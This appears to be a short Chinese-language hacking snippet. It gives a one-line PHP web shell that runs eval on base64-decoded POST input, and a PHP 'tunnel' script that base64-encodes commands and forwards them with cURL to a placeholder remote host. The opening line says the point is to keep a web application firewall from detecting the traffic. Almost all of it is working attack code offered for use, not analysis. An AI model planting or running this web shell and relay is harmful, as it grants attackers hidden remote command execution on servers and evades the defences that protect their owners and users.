一下采用base64编码使WAF无法识别接收内容从而达到目的,在必要的情况下发送也要进行编码防止WAF检测到
server
<?php if($_POST['c']!='') @eval(base64_decode($_POST[z0]));
?>
tunnel
<?php
$handle=curl_init();
$DATA=array();
$DATA=$_POST;
$DATA['c']=base64_encode(substr($DATA['c'],1));
curl_setopt($handle,CURLOPT_URL,'http://xxx/xxx.php');
curl_setopt($handle,CURLOPT_HEADER,0);
curl_setopt($handle,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($handle,CURLOPT_POST,1);
curl_setopt($handle,CURLOPT_POSTFIELDS,$DATA);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1");
//curl_setopt($ch, CURLOPT_PROXYPORT, 1080);
$output=curl_exec($handle);
if($output === FALSE) {
echo "cURL Error: " . curl_error($handle);
}
echo ($output);
curl_close($handle);
?>